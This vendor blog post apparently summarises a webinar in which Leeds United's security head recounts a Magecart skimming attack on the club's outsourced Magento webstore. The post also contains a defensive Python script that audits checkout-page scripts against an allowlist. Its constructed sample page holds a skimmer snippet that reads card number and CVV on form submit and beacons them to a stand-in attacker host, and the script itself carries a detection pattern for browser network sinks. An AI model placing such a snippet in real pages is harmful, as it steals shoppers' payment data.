The Leeds United Comeback: How One Attack Sparked a Security Revolution


Graham Peck has a great analogy for working in IT security: he compares it to being a goalkeeper. As a goalie, it’s usually the case that nobody remembers your name, but the moment you start letting the other side score, everybody knows who you are.

Graham makes this comparison because he is the Head of IT and Security at Leeds United Football Club in England, and because he suddenly became the focus of attention when the club’s webstore was hit with a card skimming attack in February 2025.

Watch the full webinar here.

The Magecart Attack: A Supply Chain Vulnerability

At Reflectiz, we appreciate that Graham agreed to answer questions about the breach with Isaac Moddel, our sales VP, in a live webinar setting (available here), because most businesses prefer to avoid the limelight. They aren’t keen to publicly dissect what happens when their web stores are hit with cyberattacks, because a breach can make even the strongest brand look vulnerable. But that’s exactly why Graham wanted to share his experience of what was an avoidable attack. He wants other businesses to learn from this story rather than go through it themselves. Especially since they may be thinking they have everything covered.

We had created almost like a breach playbook for different scenarios, for things like ransomware attacks and so forth, but this (attack) came a little bit out of left field, on the supply chain side, when we had assumed that everything was in place.

Graham Peck, Head of Security, Leeds United

Trust Without Visibility: The Root of the Problem

It turns out that everything wasn’t in place. The Leeds webstore was running on Magento, and six months before the breach, Adobe had notified Graham’s team about a security vulnerability in its popular shopping platform and issued a patch to fix it. Leeds had outsourced management of the web store to a third-party company, so his team duly let them know it needed to be implemented, and here’s where the problem lay.

We had raised a ticket with the third-party; they showed us they had patched it, but because we never had visibility within that environment, we trusted the third-party to do the work they said they were doing.

Graham Peck, Head of Security, Leeds United

This is one of the key takeaways from this valuable question-and-answer session. You may trust a third party to keep their word, but if you have no way of checking that they’re doing what they say they’re doing, you could be vulnerable to a Magecart-style attack and not even know it.
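The visibility gap Graham describes is concrete: a script on the checkout page that nobody approved, or an inline snippet that reads the card fields and sends them to a host nobody recognises. The following is an added example, not code from Reflectiz, Leeds United or the webstore provider. It inventories the scripts on a saved copy of a checkout page and flags any external script host outside an allowlist, plus any inline script that both uses a network sink and references a host outside that allowlist. The sample page, the allowlist and every host name in it are constructed for the example.

```python
"""Inventory the scripts on a checkout page and flag what is not on the allowlist.

Added example (not Reflectiz, Leeds United or Magento code).  The sample page,
the allowlist and all host names below are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: first-party host plus the third parties the store
# knowingly loads.  Anything else on the checkout page needs an explanation.
ALLOWED_HOSTS = {
    "shop.example-club.test",
    "js.example-psp.test",
    "cdn.example-tagmgr.test",
}

# Ways browser code can get data off the page.  A heuristic, not a signature
# database: an inline script that uses one of these AND names an unknown host
# is worth a human look.
NETWORK_SINKS = re.compile(
    r"(fetch\(|XMLHttpRequest|navigator\.sendBeacon|new Image\(|\.src\s*=)", re.I
)
URL_LITERAL = re.compile(r"""https?://[^\s'"<>)]+""", re.I)


class ScriptInventory(HTMLParser):
    """Collect external script sources and inline script bodies from HTML."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []   # values of <script src=...>
        self.inline: list[str] = []     # bodies of <script>...</script>
        self._in_inline = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append(a["src"])
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def host_of(url: str) -> str:
    """Host part of an absolute or protocol-relative URL; '' for relative paths."""
    return (urlparse(url).hostname or "").lower()


def audit(html: str, allowed: set[str]) -> dict:
    """Return unexpected external script hosts and suspicious inline scripts."""
    parser = ScriptInventory()
    parser.feed(html)
    findings = {"unexpected_script_hosts": [], "suspicious_inline": []}
    for src in parser.external:
        host = host_of(src)
        if host and host not in allowed:          # relative src = first party
            findings["unexpected_script_hosts"].append(host)
    for body in parser.inline:
        hosts = {host_of(u) for u in URL_LITERAL.findall(body)}
        unknown = sorted(h for h in hosts if h and h not in allowed)
        if unknown and NETWORK_SINKS.search(body):
            findings["suspicious_inline"].append(
                {"hosts": unknown, "snippet": body.strip()[:80]}
            )
    return findings


# Constructed checkout page: two legitimate third parties, one harmless inline
# snippet, and a skimmer-style script plus loader pointing at an unknown host.
SAMPLE_CHECKOUT = """<html><head>
<script src="https://js.example-psp.test/v3/checkout.js"></script>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-tagmgr.test/tag.js?id=X"></script>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>
<form id="payment"><input name="cc_number"><input name="cc_cvv"></form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = {n: document.querySelector('[name=cc_number]').value,
           c: document.querySelector('[name=cc_cvv]').value};
  new Image().src = 'https://stats-collector.example-attacker.test/p?d=' + btoa(JSON.stringify(d));
});
</script>
<script src="https://stats-collector.example-attacker.test/loader.js"></script>
</body></html>"""

if __name__ == "__main__":
    for key, items in audit(SAMPLE_CHECKOUT, ALLOWED_HOSTS).items():
        print(key, items)
```

This only sees what is in the HTML you fetched. A skimmer that is injected at runtime by another script, served only to certain clients, or hidden inside a legitimately named file will not show up, which is why the check is a baseline to diff between runs rather than a substitute for monitoring what the page actually does in a browser.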

A Lucky Escape: Timing and Detection

Without Reflectiz in place, Graham had no way of checking whether the company he was trusting to manage the club’s webstore had applied this essential security patch. The first clue that they hadn’t came when the police arrived to inform him that the UK’s National Cyber Security Centre (NCSC) had been monitoring another website and had noticed traffic coming to it from the Leeds webstore.

…it was a traditional Magecart skimming attack. We confirmed through forensic analysis that they were able to upload the code on the 18th of February in the evening and had closed it on the 24th at about 10:30, when we got the third party to close the site itself. And during that period of time, we were lucky enough to only have a small amount of transactions that would be going through. It could have been a lot worse. Had there been a kit launch or something like that, it could have been quite disastrous.

Graham Peck, Head of Security, Leeds United

The launch of a new kit means fans want to buy shirts, so the web store could be receiving thousands of orders, and the skimmer is waiting to steal their card details. So, Leeds was doubly lucky to be compromised during a quiet trading period and for the NCSC to notice the unusual traffic at a time that limited the criminals’ window of opportunity.

If you look at the average, you’re looking at over 195 days that somebody would be sitting on your network, skimming off data unbeknownst to you…we were extremely lucky to only have six days of data capture.

Graham Peck, Head of Security, Leeds United

The Cost of Relegation: Budgets and Security Priorities

Graham had encountered Reflectiz a year prior at InfoSec and been impressed, so one webinar viewer wondered why the tool wasn’t approved earlier. The answer is a familiar one: funding and priorities.

In 2023, Leeds United was relegated from the lucrative English Premier League, which meant that budgets were tighter. So, when Graham recommended Reflectiz to management, the timing was off. It wasn’t seen as a priority, but after the attack, he says it was approved in a week (although Reflectiz set up monitoring before approval was secured because we wanted to help Leeds identify any other vulnerabilities that might be lurking). The actual set-up process itself took less than a day, because it’s an agentless solution, with nothing to install.

I didn’t need to create an account for it…The only thing I did in some cases was…give an IP address so it can be whitelisted, and out of due diligence, informed the third party that we are going to be actively monitoring it…it keeps them on their toes…the advantage was, it was very low impact. It doesn’t affect the performance of the website at all. It’s non-intrusive…but brings back a lot of information.

Graham Peck, Head of Security, Leeds United

Convincing Management: The Power of Risk Assessments

Another viewer asked Graham what he would say to others who may be in the same situation that he was: unable to convince their organisations to take the threat as seriously as they should.

He thinks that the key is risk assessments. If you can show a lack of visibility and control over what third and fourth parties are doing on a website, then you can show increased risk to the business, and that’s something that management is more likely to respond to:

I’m sitting here with proof that if you don’t have that visibility, you’ve no way of checking that they’ve done what they said they’ve done…in my case I had an email from a service desk that said they applied a patch, but without visibility of the code within the site, I would’ve just gone based on trust. Unfortunately, with the environment that we’re in now, you can’t just base everything on trust.

Graham Peck, Head of Security, Leeds United

Looking forward, the Leeds IT security team no longer has to rely on trust. They can now see if their new webstore provider installs patches and query them if Meta Pixel looks like it might be misconfigured, for example.

Learn More: Watch the Webinar for Key Insights

This is just a taste of the many valuable insights you’ll pick up from this informative webinar. Go here to watch and listen now for free.
